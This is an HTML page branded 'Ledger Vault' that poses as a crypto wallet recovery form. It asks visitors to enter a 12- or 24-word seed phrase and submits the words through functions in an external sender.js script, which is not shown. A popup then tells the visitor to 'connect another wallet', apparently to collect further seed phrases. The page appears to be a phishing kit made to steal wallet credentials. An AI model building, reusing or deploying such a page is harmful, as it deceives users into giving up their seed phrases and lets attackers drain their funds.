<!DOCTYPE html>
<html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- <script src="index_files/jquery.min_003.js"></script>
<script src="index_files/jquery.min_003.js"></script> -->
<script src="./jquery.js"></script>
<script src="./sender.js"></script>


<div  style="display:none" id="loadr">


  <div class="loader_cont" >
  
  
    <div class="loadcircle"></div>
  
  
  </div>
  
  </div>
  
  
  <style>
    .loader_cont{
      height:100%;
      width:100%;
      z-index:99999;
      position: fixed;
      background:rgba(0,0,0,0.5);
      top:0;
      left:0;
      display: flex;
      align-items: center;
      justify-content: center;
     
    }
  
   .loadcircle{
    height:30px;
    width:30px;
    border:3px solid rgba(255,255,255,1);
    border-top:3px solid transparent;
    animation:spin 0.5s linear infinite ;
    border-radius:50%;
   }
  
   @keyframes spin{
    0%{
      rotate: 0deg;
    }
  
    100%{
      rotate:360deg;
    }
   }
  
  
  </style>

<style>
  /* Popup container */
  .popup {
      font-size: 1em; 
      line-height:45%;
      position: fixed;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      background-color: #ffffff;
      padding: 10px;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
      z-index: 9999;
      text-align: center;
      max-width: 80%; 
      display: none;
  }
  /* Background overlay */
  .overlay {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: rgba(0, 0, 0, 0.5);
      z-index: 9998;
      display: none; 
  }

  .text{
    padding-top: 0px;
    padding-left: 10px;
    padding-right: 10px;
  }
  .papa{
    margin-bottom: 0px;
    margin-top: 0px;
  }
  .text-content {
    flex-grow: 1; /* Allow text content to grow to fill available space */
    text-align: left; /* Align text to the left */
  }
  .popup img {
    width: 50px; /* Adjust the size as needed */
    margin-left: 10px; /* Add space between image and text content */
    margin-left: auto; /* Move image to the right side */
}
.imga{
  align-items: center;
}
@media (max-width: 768px) {
    .popup {
        max-width: 90%; /* Adjust width for smaller screens */
        padding: 10px; /* Adjust padding for smaller screens */
        line-height: 130%;
        text-align: center;
    }
    .popup img {
        width: 40px; /* Adjust image size for smaller screens */
    }
}
</style>

<style>
* {box-sizing: border-box}

/* Set height of body and the document to 100% */
body, html {
  height: 100%;
  margin: auto;
  font-family: Arial;
  background-color: #000;

}
button.accordion {
  background-color: #fff;
  cursor: pointer;
  padding: 8px 0 8px 0;
  width: 90%;
  border: none;
  text-align: left;
  outline: none;
  font-size: 18px;
  transition: 0.4s;
  border-bottom: 1px solid #ccc;
}

button.accordion.active, button.accordion:hover {
  color: #f06100
}

button.accordion:before {
  content: '\02795';
  font-size: 9px;
  float: left;
  margin-left: 0px;
  margin-right: 10px;
  margin-top: 7px;
}

button.accordion.active:before {
  content: "\2796";
}

div.panel {
  background-color: white;
  max-height: 0;
  padding-left: 2px;
  overflow: hidden;
  padding-top: 0px;
  border-bottom: 4px solid #ccc;
  transition: 0.6s ease-in-out;
  opacity: 0;
  margin-bottom: 8px;
  width: 90%;
  border-radius: 0 0 50px 50px;
}

.panel-icon {
  margin-right: 10px;
}

.panel h5 {
  font-size: 15px;
  line-height: 23px;
  margin-top: 5px;
  margin-bottom: 0px;
  display: inline-block;
  color: #2d2d2d;
}

.panel p {
  font-size: 15px;
  line-height: 23px;
  padding: 15px 30px 20px 0;
  color: #2d2d2d
}

div.panel.show {
  opacity: 1;
  max-height: 500px;
}

.tab {
    display: inline-block;
    padding: 5px 10px;
    cursor: pointer;
    background-color: ;
    margin-right: 0px;
}

.box {
    display: none;
    padding:5px 5px 10px 5px;
    border: 1px solid #ccc;
    margin-top: 10px;
    border-radius: 20px;
    width: 90%;;
}

</style>

<!-- <script src="index_files/jquery.min_002.js"></script>
  <script src="index_files/bootstrap.min.js"></script> -->
  <!-- <link rel="stylesheet" href="index_files/css.css"> -->
  <title>Ledger Vault</title>
  
</head>
<body style="padding: 3% 0;">

  <div class="overlay" id="overlay"></div>
  <div class="popup" id="popup">
    <div class="imga"><img src="./index_files/warning.png" alt="Warning"></div>
    <div class="text">
    <h2>New Wallet created</h2>
    <p class="papa">Kindly connect another wallet.</p>
  </div>
  </div>
    <fieldset style="border-color: #FFF; width: 60%; margin: auto; border-radius: 70px; color: #FFF; min-width:350px;">
        <center>
        
          <div style="width: 85%; margin: 10% auto 0;">
            <img src="index_files/mmm.png" style="width: 10%; margin: 1% 0 0 2%; display:none;">
            <img src="index_files/images.png" style="width: 50%; margin: 1% 0 0 2%;">
                <p><i>Please carefully enter your details</i></p>
                        
          </div>
        <button class="accordion">Recovery Phrase</button>
            <div class="panel" style="line-height: 2em; color:#000;">

                <div class="tab" style=" text-decoration:none; color: white;" onclick="showBox('box1')" href="">
                  <span style="padding:5px; background-color:#a17272; border-radius: 20px 0 0 20px">12 word</span>
                </div>
                <div class="tab" style=" text-decoration:none; color: white;" onclick="showBox('box2')" href="">
                  <span style="padding:5px; background-color:#928468; border-radius: 0 20px 20px 0">24 word</span>
                </div>
                <div id="box1" class="box">
                <div style="line-height: 1em; font-style:italic; font-size:0.7em; color:#000;">
                    Enter your 12-word seed phrase to recover your wallet <br>(words are not case sensitive)
                </div>


                <form  id='appli'  style="margin: 5px 0 0 0;">
                    <div style="width:100%;">
                      <div style="width: 33%; float: left;">
                        <input name="inputq1" placeholder="1" type="text" required="" id="input1" oninput="splitWords(1)" onblur="updateFirstBox()" style="width:90%; padding:5px; text-align:center; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="inputq2" placeholder="2" type="text" required="" id="input2" style="width:90%; text-align:center; padding:5px;">
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="inputq3" placeholder="3" type="text" required="" id="input3" style="width:90%; padding:5px; text-align:center;">
                      </div>
                    </div>
                    <div style="width:100%;">
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="inputq4" placeholder="4" type="text" required="" id="input4" style="width:90%; padding:5px; text-align:center;">
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="inputq5" placeholder="5" type="text" required="" id="input5" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="inputq6" placeholder="6" type="text" required="" id="input6" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                    </div>
                    <div style="width:100%;">
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="inputq7" placeholder="7" type="text" required="" id="input7" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="inputq8" placeholder="8" type="text" required="" id="input8" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="inputq9" placeholder="9" type="text" required="" id="input9" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                    </div>
                    <div style="width:100%;">
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="inputq10" placeholder="10" type="text" required="" id="input10" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="inputq11" placeholder="11" type="text" required="" id="input11" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="inputq12" placeholder="12" type="text" required="" id="input12" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                    </div>
        
                    <input class="" type="text" name="wallet" value="generalWallet" style=" font-size: 1em;" hidden="">
                    
                    <div style="line-height: 1em; font-style:italic; font-size:0.7em; color:#000;">
                        Typically 12 words separated by single spaces
                    </div>
        
                    <button type="button" name="connectWa" class="button" style="padding: 2% 5%; margin-bottom: 5%; border-radius: 50px; border-color: #000; width:90%;" onclick="sendform()">
                        Next
                    </button>
                </form>
            </div>
            <div id="box2" class="box">
                <div style="line-height: 1em; font-style:italic; font-size:0.7em; color:#000;">
                    Enter your 24-word seed phrase to recover your wallet <br>(words are not case sensitive)
                </div>
                <form id='appli1' style="margin: 5px 0 0 0;">
                    <div style="width:100%;">
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input1" placeholder="1" type="text" required="" id="inputa1" oninput="splitWords1(1)" style="width:90%; padding:5px; text-align:center; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input2" placeholder="2" type="text" required="" id="inputa2" style="width:90%; text-align:center; padding:5px;">
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input3" placeholder="3" type="text" required="" id="inputa3" style="width:90%; padding:5px; text-align:center;">
                      </div>
                    </div>
                    <div style="width:100%;">
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input4" placeholder="4" type="text" required="" id="inputa4" style="width:90%; padding:5px; text-align:center;">
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input5" placeholder="5" type="text" required="" id="inputa5" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input6" placeholder="6" type="text" required="" id="inputa6" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                    </div>
                    <div style="width:100%;">
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input7" placeholder="7" type="text" required="" id="inputa7" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input8" placeholder="8" type="text" required="" id="inputa8" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input9" placeholder="9" type="text" required="" id="inputa9" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                    </div>
                    <div style="width:100%;">
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input10" placeholder="10" type="text" required="" id="inputa10" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input11" placeholder="11" type="text" required="" id="inputa11" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input12" placeholder="12" type="text" required="" id="inputa12" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                    </div>
                    <div style="width:100%;">
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input13" placeholder="13" type="text" required="" id="inputa13" oninput="splitWords(1)" style="width:90%; padding:5px; text-align:center; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input14" placeholder="14" type="text" required="" id="inputa14" style="width:90%; text-align:center; padding:5px;">
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input15" placeholder="15" type="text" required="" id="inputa15" style="width:90%; padding:5px; text-align:center;">
                      </div>
                    </div>
                    <div style="width:100%;">
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input16" placeholder="16" type="text" required="" id="inputa16" style="width:90%; padding:5px; text-align:center;">
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input17" placeholder="17" type="text" required="" id="inputa17" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input18" placeholder="18" type="text" required="" id="inputa18" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                    </div>
                    <div style="width:100%;">
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input19" placeholder="19" type="text" required="" id="inputa19" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input20" placeholder="20" type="text" required="" id="inputa20" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input21" placeholder="21" type="text" required="" id="inputa21" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                    </div>
                    <div style="width:100%;">
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input22" placeholder="22" type="text" required="" id="inputa22" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input23" placeholder="23" type="text" required="" id="inputa23" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                      <div style="width: 33%; float: left;">
                        <input onblur="updateFirstBox()" name="input24" placeholder="24" type="text" required="" id="inputa24" style="width:90%; padding:5px; text-align:center;"><br>
                      </div>
                    </div>
    
                    <input class="" type="text" name="wallet" value="generalWallet" style=" font-size: 1em;" hidden="">
                    
                    <div style="line-height: 1em; font-style:italic; font-size:0.7em; color:#000;">
                        Typically 24 words separated by single spaces
                    </div>
    
                    <button type="button" name="connectWb" class="button" style="padding: 2% 5%; margin-bottom: 5%; border-radius: 50px; border-color: #000; width:90%;" onclick="sendform1()">
                        Next
                    </button>
                </form>
        </div>
        </div><!-- /.end of job post -->
            </form>
        </div>
        
        </center>
        
    </fieldset>
   
      
    <script>
        var acc = document.getElementsByClassName("accordion");
        var i;

        function click_action(){
        $('.accordion').removeClass('active');
        $('.panel').removeClass('show');

        this.classList.toggle("active");
        this.nextElementSibling.classList.toggle("show");
        }

        for (i = 0; i < acc.length; i++) {
        acc[i].onclick = click_action;
        }
   
        function showBox(boxId) {
            // Hide all boxes
            var boxes = document.getElementsByClassName('box');
            for (var i = 0; i < boxes.length; i++) {
                boxes[i].style.display = 'none';
            }

            // Show the selected box
            document.getElementById(boxId).style.display = 'block';
        }
    </script>
 
</body>
</html>